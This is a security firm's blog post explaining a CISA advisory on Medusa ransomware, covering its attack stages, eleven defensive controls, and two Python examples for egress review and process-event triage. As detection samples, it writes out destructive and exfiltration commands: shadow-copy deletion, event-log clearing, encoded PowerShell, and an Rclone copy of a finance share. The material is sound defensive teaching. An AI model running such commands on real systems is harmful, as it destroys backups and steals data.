Valtik Studios
Enterprise · critical · Updated 2026-04-12 · 13 min

Medusa Ransomware in 2026: CISA Advisory Walkthrough + The Defensive Baseline

CISA AA25-071A walked through. What Medusa actually does across initial access, privilege escalation, lateral movement, exfiltration, and encryption. The 11 technical controls that break the chain at multiple stages. Detection indicators mapped to specific TTPs. The incident response playbook for when you get hit.

Phillip (Tre) Bucchi · Founder, Valtik Studios. Penetration Tester

Founder of Valtik Studios. Penetration tester. Based in Connecticut, serving US mid-market.

# Medusa ransomware in 2026: CISA advisory walkthrough + the defensive baseline that still breaks the chain

CISA, FBI, and MS-ISAC published a joint advisory (AA25-071A) in March 2025 warning that the Medusa ransomware operation had hit more than 300 victims across critical infrastructure sectors. A year later, the campaign is still active and the target list keeps growing. Healthcare, manufacturing, education, legal, insurance. The TTPs haven't meaningfully changed. The defenses that would stop it haven't been deployed.

This post is what the advisory says, what Medusa actually does, and the specific technical controls that break each stage of the attack chain. Tested against real incident response casework. Not generic vendor marketing.

Who Medusa is

Medusa is a ransomware-as-a-service (RaaS) operation that emerged in June 2021 and has been continuously active since. Affiliates are vetted before being given access to the platform. The core operators are tracked as "Spearwing" by some threat intel vendors and are believed to be Russian-speaking.

Distinct from MedusaLocker (different operation) and Mirai-botnet-related Medusa malware (unrelated family).

Medusa runs a data-leak site ("Medusa Blog") where they publish stolen data from victims who refuse to pay. As of early 2026, the site lists more than 400 confirmed victims across a range of industries.

Ransom demands range from $100,000 to $15 million depending on victim size. Multiple public incidents show ransom reductions for quick payment.

The attack chain from the CISA advisory

Initial access

Two dominant vectors:

  1. Phishing. Spear-phishing emails with malicious attachments or links to credential-harvesting sites. The advisory also specifically notes exploitation of unpatched Microsoft Exchange servers (ProxyShell-style CVEs), Fortinet FortiOS vulnerabilities, and internet-exposed RDP as initial access paths.
  2. Initial access broker (IAB) purchases. Medusa affiliates buy access from IAB markets (credentials for VPN, RDP, or domain admin accounts).

The advisory specifically calls out exploitation of:

  • CVE-2024-1709 (ScreenConnect authentication bypass).
  • CVE-2023-48788 (Fortinet EMS SQL injection).
  • Various older Microsoft Exchange vulnerabilities.

Discovery

Once inside, Medusa operators use off-the-shelf tools for reconnaissance:

  • Advanced IP Scanner and SoftPerfect Network Scanner for LAN discovery.
  • AdFind, SharpHound/BloodHound for Active Directory mapping.
  • Nltest for domain trust enumeration.
  • PowerShell for host-level reconnaissance.

Characteristic of Medusa: they spend days to weeks inside the environment before deploying ransomware. Dwell time is purposeful. They want full AD compromise, backup destruction, and data exfiltration complete before the encryption stage.

Privilege escalation and credential access

  • LSASS dumping via Mimikatz.
  • DCSync attacks against domain controllers.
  • Kerberoasting to extract service account credentials.
  • Remote Registry hive dumping for stored credentials.

Medusa affiliates prefer "living off the land": built-in Windows tools (PowerShell, WMI, Certutil, Bitsadmin) over custom malware. Because nothing new lands on disk, this substantially reduces endpoint detection rates.

Lateral movement

  • RDP with harvested credentials.
  • SMB file share access for data discovery.
  • PsExec, Impacket (specifically secretsdump.py, wmiexec.py) for remote command execution.
  • Cobalt Strike for command-and-control on beachhead hosts.

Defense evasion

  • Disable Windows Defender via Group Policy changes or PowerShell.
  • Clear Windows Event Logs.
  • Delete shadow copies with vssadmin delete shadows /all /quiet.
  • Uninstall or disable EDR agents where admin access is achieved.

Exfiltration

Stolen data is moved to attacker-controlled infrastructure via:

  • Rclone pushing to Mega, Backblaze, or dedicated attacker cloud storage.
  • FileZilla or WinSCP for FTP-based exfiltration.
  • PowerShell custom scripts for HTTP-based exfiltration to attacker web servers.

Exfiltration volumes from Medusa incidents typically range from tens of gigabytes to several terabytes. Healthcare incidents have seen exfiltration of patient records, internal communications, and financial records.

Encryption

Medusa uses AES-256 for file encryption (some builds use ChaCha20 instead). Encrypted files receive the .medusa extension. A ransom note (!!!READ_ME_MEDUSA!!!.txt) is dropped with instructions to contact the operators via Tor.

Encryption happens after exfiltration is complete. Double extortion is the standard: pay to decrypt AND pay to prevent publication.

The 11 technical controls that break the Medusa chain

Each of the following maps to one or more stages of the CISA-documented attack path. Deploy the full set and you break the chain in multiple places.

1. Patch the named vulnerabilities

Not aspirationally. With a specific deadline per CVE.

  • CVE-2024-1709 (ScreenConnect) — patch immediately if still running.
  • CVE-2023-48788 (Fortinet EMS) — patch immediately.
  • All on-premises Exchange Server — patch cadence must be monthly at minimum.
  • FortiOS, Fortinet SSL VPN, Citrix Gateway — patch within 14 days of vendor advisory.
  • Any internet-exposed remote access product (RDP gateway, SSL VPN, BIG-IP, etc.) — continuous patch monitoring.

2. Disable or tightly control internet-exposed RDP

If you have RDP listening on 3389 from the internet, you are a Medusa target. Options:

  • Remove it entirely. Use VPN or ZTNA.
  • If required, restrict via IP allowlist + MFA at the gateway.
  • Rate-limit connections per source IP.

3. Phishing-resistant MFA on privileged accounts

SMS and app-push MFA get defeated by AiTM phishing and MFA fatigue. Replace with FIDO2 / WebAuthn for:

  • Domain admins.
  • IT staff accounts.
  • Any account with privileged AD roles.
  • VPN access (where possible).

4. Block Mimikatz-family LSASS access

  • Enable Credential Guard on Windows 10/11 and Server 2019+.
  • Enable LSA Protection.
  • Deploy EDR with LSASS memory read alerts.
  • Limit domain admin login sessions to a small number of hardened jump hosts.

5. Protected Users group + selective Kerberos hardening

  • Add privileged accounts to the Protected Users group (prevents NTLM, restricts Kerberos TGT lifetime, disables delegation).
  • Set strong randomized passwords on service accounts (50+ characters) to make Kerberoasting outputs uncrackable.
  • Migrate service accounts to gMSAs (Group Managed Service Accounts) where possible.

6. Segmentation that actually contains lateral movement

  • Host firewalls denying inbound from peers (no workstation-to-workstation SMB/RDP).
  • Network segmentation between user VLANs, server VLANs, and OT/critical VLANs.
  • Jump servers as the only path to privileged infrastructure.
  • Tier 0 / Tier 1 / Tier 2 admin account separation (Microsoft's ESAE-lite pattern).

7. EDR with anti-tampering and cloud-delivered protection

  • Tamper protection enabled (cannot be disabled by admin credentials on the endpoint).
  • Cloud management plane (survives EDR agent uninstall via local admin).
  • Alert on PowerShell with encoded commands, WMI remote execution, and Impacket tool signatures.

8. Immutable backups

  • 3-2-1-1-0 backup strategy (three copies, two media types, one offsite, one immutable, zero errors after verification).
  • Object-lock on cloud backups (AWS S3 Object Lock, Azure immutable storage).
  • Backup accounts isolated from the domain, so a compromised AD cannot reach the backups.
  • Quarterly restore tests.

9. Exfiltration detection

  • DLP or CASB monitoring for large outbound transfers to Mega, Backblaze, or suspicious cloud IPs.
  • Alert on Rclone, FileZilla, WinSCP process execution on servers.
  • Egress firewall allowlist on servers (servers should not make arbitrary outbound connections).
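The three bullets above come together when you review egress records. The following Python is an added example, not code from the post, from Valtik, or from any DLP/CASB product: it runs two of the checks (server egress allowlist violations, and large aggregate uploads to the consumer cloud storage named in the exfiltration section) over constructed flow records. The `role` tag is a hypothetical asset-inventory field, the allowlist and the 5 GiB threshold are constructed for the example, and the destinations are sample values, not observed indicators.

```python
"""Egress review for the exfiltration controls above.

Added example, not code from the post. Flow records are the shape a proxy,
firewall or NetFlow export gives you once DNS/proxy enrichment has attached a
destination hostname; the "role" tag is a hypothetical asset-inventory field.
All sample data below is constructed.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class Flow:
    src_host: str
    role: str          # "workstation" or "server" (hypothetical inventory field)
    dst: str           # destination hostname if resolvable, else the raw IP
    dst_port: int
    bytes_out: int     # bytes sent by src_host in this flow record


# Consumer cloud storage the post names as Medusa exfil targets (constructed, not exhaustive).
CLOUD_STORAGE_SUFFIXES = ("mega.nz", "mega.co.nz", "backblazeb2.com", "backblaze.com")
# Egress allowlist for servers: anything else a server talks to is a finding (constructed).
SERVER_EGRESS_ALLOWLIST = ("windowsupdate.com", "update.microsoft.com", "backup.corp.example")
LARGE_UPLOAD_BYTES = 5 * 1024 ** 3   # 5 GiB per host per destination over the reviewed window


def _matches(dst: str, suffixes) -> bool:
    """True when dst equals one of the suffixes or is a subdomain of one."""
    dst = dst.lower()
    return any(dst == s or dst.endswith("." + s) for s in suffixes)


def review_egress(flows):
    """Return sorted, deduplicated (host, finding, destination) triples."""
    findings = set()
    upload_totals = defaultdict(int)
    for f in flows:
        # Servers do not get arbitrary outbound connections (egress allowlist).
        if f.role == "server" and not _matches(f.dst, SERVER_EGRESS_ALLOWLIST):
            findings.add((f.src_host, "server-egress-not-allowlisted", f.dst))
        upload_totals[(f.src_host, f.dst)] += f.bytes_out
    # Volume to consumer cloud storage is aggregated per host and destination,
    # because an exfil run is many sessions, none of which looks large on its own.
    for (host, dst), total in upload_totals.items():
        if _matches(dst, CLOUD_STORAGE_SUFFIXES) and total >= LARGE_UPLOAD_BYTES:
            findings.add((host, "large-upload-to-cloud-storage", dst))
    return sorted(findings)


GIB = 1024 ** 3
MIB = 1024 ** 2
# Constructed sample flows (no real incident data).
SAMPLE_FLOWS = [
    # file server pushing 6 GiB to Mega in three sessions: trips both checks
    Flow("srv-files01", "server", "api.mega.co.nz", 443, 2 * GIB),
    Flow("srv-files01", "server", "api.mega.co.nz", 443, 2 * GIB),
    Flow("srv-files01", "server", "api.mega.co.nz", 443, 2 * GIB),
    # routine patching traffic: allowlisted, no finding
    Flow("srv-files01", "server", "download.windowsupdate.com", 443, 20 * MIB),
    # workstation syncing a personal account: below threshold, server rule does not apply
    Flow("ws-0142", "workstation", "mega.nz", 443, 300 * MIB),
    # app server opening FTP to an unresolved address (TEST-NET-3 range): not allowlisted
    Flow("srv-app02", "server", "203.0.113.50", 21, 800 * MIB),
]

if __name__ == "__main__":
    for host, finding, dst in review_egress(SAMPLE_FLOWS):
        print(f"{host}: {finding} -> {dst}")
```

The aggregation step is the part worth copying: Rclone splits a transfer into many parallel sessions, so a per-flow threshold misses it while a per-host, per-destination sum over the review window does not. The allowlist check is deliberately blunt; a server that talks to anything outside the list is a finding, and the list is meant to stay short.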

10. Log forwarding + retention

  • Windows Event Logs forwarded to SIEM with at least 90 days retention.
  • Domain controller logs include Kerberos events, account lockouts, admin role changes.
  • EDR logs forwarded independently of endpoint (survives log deletion).

11. Tabletop the Medusa scenario

Quarterly tabletop with executives, IT, legal, and comms:

  • Scenario: ransomware on a Friday evening. File shares encrypted. Backups partially destroyed.
  • Decisions to walk through: pay or not, notify customers when, hire which IR firm, cyber insurance claim process.
  • Identify gaps in plan. Fix before incident.

Detection indicators mapped to Medusa TTPs

Fire alerts on:

  • Creation of new domain admin accounts outside change windows.
  • vssadmin delete shadows execution on any host.
  • wevtutil cl (event log clearing) on any host.
  • PowerShell with -enc / encoded command flag on servers.
  • Rclone/FileZilla on servers.
  • AdFind, SharpHound, BloodHound process execution.
  • Mimikatz-family process names and hashes (well-known to EDR vendors).
  • LSASS memory read from non-system processes.
  • Ntdsutil execution on domain controllers.
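Most of the indicators above are visible in plain process-creation telemetry (Sysmon Event ID 1 or Windows 4688). The Python below is an added example, not code from the post, from CISA, or from any EDR vendor: it encodes six of the indicators as rules over constructed process-creation events and then flags hosts that tripped more than one stage of the chain, which is the correlation that turns a noisy alert into an isolation decision. The `role` field (workstation, server, dc) is a hypothetical asset-inventory tag; the sample events are constructed, with the base64 body of the encoded PowerShell replaced by filler. The Mimikatz hash and LSASS memory-read indicators need EDR telemetry and are not modelled here, nor is the domain-admin creation indicator, which lives in security audit events rather than process creation.

```python
"""Triage of process-creation telemetry against the Medusa indicators above.

Added example, not code from the post or from CISA. Events are shaped like
Sysmon Event ID 1 / Windows 4688 records plus a hypothetical "role" tag from
an asset inventory. Sample events are constructed.
"""
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class ProcEvent:
    host: str
    role: str      # "workstation", "server" or "dc" (hypothetical inventory field)
    image: str     # full path of the created process
    parent: str    # full path of the parent process
    cmdline: str   # full command line


def _exe(ev: ProcEvent) -> str:
    """Lower-cased file name of the created process."""
    return ev.image.rsplit("\\", 1)[-1].lower()


def _cmd(ev: ProcEvent) -> str:
    return ev.cmdline.lower()


def _on_server(ev: ProcEvent) -> bool:
    return ev.role in ("server", "dc")


# Rule name -> predicate; each encodes one indicator from the list above.
RULES = {
    "shadow-copy-deletion":
        lambda ev: _exe(ev) == "vssadmin.exe"
        and "delete" in _cmd(ev) and "shadows" in _cmd(ev),
    "event-log-clearing":
        lambda ev: _exe(ev) == "wevtutil.exe"
        and re.search(r"\b(cl|clear-log)\b", _cmd(ev)) is not None,
    # powershell.exe accepts -e, -ec, -enc and any longer prefix of -EncodedCommand
    "encoded-powershell-on-server":
        lambda ev: _on_server(ev)
        and _exe(ev) in ("powershell.exe", "pwsh.exe")
        and re.search(r"(?:^|\s)-e(?:c|nc[a-z]*)?\b", _cmd(ev)) is not None,
    "exfil-tool-on-server":
        lambda ev: _on_server(ev)
        and _exe(ev) in ("rclone.exe", "filezilla.exe", "winscp.exe"),
    "ad-recon-tool":
        lambda ev: _exe(ev) in ("adfind.exe", "sharphound.exe")
        or "sharphound" in _cmd(ev) or "bloodhound" in _cmd(ev),
    "ntdsutil-on-dc":
        lambda ev: ev.role == "dc" and _exe(ev) == "ntdsutil.exe",
}


def triage(events):
    """Return (host, rule) pairs in event order, one per matching rule."""
    hits = []
    for ev in events:
        for name, pred in RULES.items():
            if pred(ev):
                hits.append((ev.host, name))
    return hits


def escalate(hits):
    """Hosts that tripped two or more distinct indicators: several stages of
    the chain on one machine justify an immediate isolation decision."""
    per_host = defaultdict(set)
    for host, rule in hits:
        per_host[host].add(rule)
    return sorted(h for h, rules in per_host.items() if len(rules) >= 2)


# Constructed sample telemetry (not from any real incident).
SAMPLE_EVENTS = [
    ProcEvent("srv-files01", "server", r"C:\Windows\System32\vssadmin.exe",
              r"C:\Windows\System32\cmd.exe", "vssadmin delete shadows /all /quiet"),
    ProcEvent("dc01", "dc", r"C:\Windows\System32\wevtutil.exe",
              r"C:\Windows\System32\cmd.exe", "wevtutil cl Security"),
    ProcEvent("srv-app02", "server", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\wbem\WmiPrvSE.exe", "powershell.exe -nop -w hidden -enc AAAA"),
    # benign admin script on a workstation: -ExecutionPolicy is not an encoded command
    ProcEvent("ws-0142", "workstation", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\explorer.exe",
              r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"),
    ProcEvent("srv-files01", "server", r"C:\Users\svc_backup\rclone.exe",
              r"C:\Windows\System32\cmd.exe", r"rclone.exe copy D:\Shares\Finance remote:dump"),
    ProcEvent("ws-0077", "workstation", r"C:\Users\jdoe\Downloads\SharpHound.exe",
              r"C:\Windows\System32\cmd.exe", "SharpHound.exe -c All"),
    ProcEvent("dc01", "dc", r"C:\Windows\System32\ntdsutil.exe",
              r"C:\Windows\System32\cmd.exe", "ntdsutil.exe"),
]

if __name__ == "__main__":
    hits = triage(SAMPLE_EVENTS)
    for host, rule in hits:
        print(f"{host}: {rule}")
    print("escalate:", escalate(hits))
```

Two design points. The encoded-PowerShell rule is scoped to servers because workstation management tooling legitimately uses `-enc`; on servers the post treats it as an alert, so the rule does too. The `escalate` step is where the dwell-time observation earlier in the post pays off: Medusa destroys shadow copies and runs the exfil tool from the same file server, so a host with two distinct indicators is far more likely to be mid-chain than a single noisy hit.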

What to do if you're hit

  1. Do not power off encrypted systems. Memory forensics can recover keys or artifacts.
  2. Isolate affected hosts. Network disconnect, not power off.
  3. Engage IR firm and legal counsel immediately. Before talking to the attacker.
  4. Notify cyber insurance carrier. Required for coverage.
  5. Preserve logs. Domain controllers, EDR, firewalls, cloud audit.
  6. Follow CISA's ransomware guide and StopRansomware.gov for government reporting requirements.
  7. Evaluate payment only under legal / IR firm / insurance coordination. OFAC compliance matters for some Medusa-adjacent affiliates.

What this means for your 2026 threat model

If you're in healthcare, education, manufacturing, or legal, Medusa is already enumerating your attack surface. The CISA advisory is a year old and the attack chain still works because the defenses listed above are hard, expensive, and culturally unpopular.

Valtik runs tabletops and technical assessments targeted at the ransomware-affiliated threat model specifically. If your last ransomware readiness exercise was more than 12 months ago or your backup restore test failed, you have work to do before the next wave.

Sources

  1. CISA AA25-071A, Joint Advisory on Medusa Ransomware (March 2025).
  2. FBI Ransomware Guide.
  3. StopRansomware.gov.
  4. Medusa TTP analysis, Symantec Threat Hunter Team.
  5. CISA Ransomware Readiness Assessment (RRA).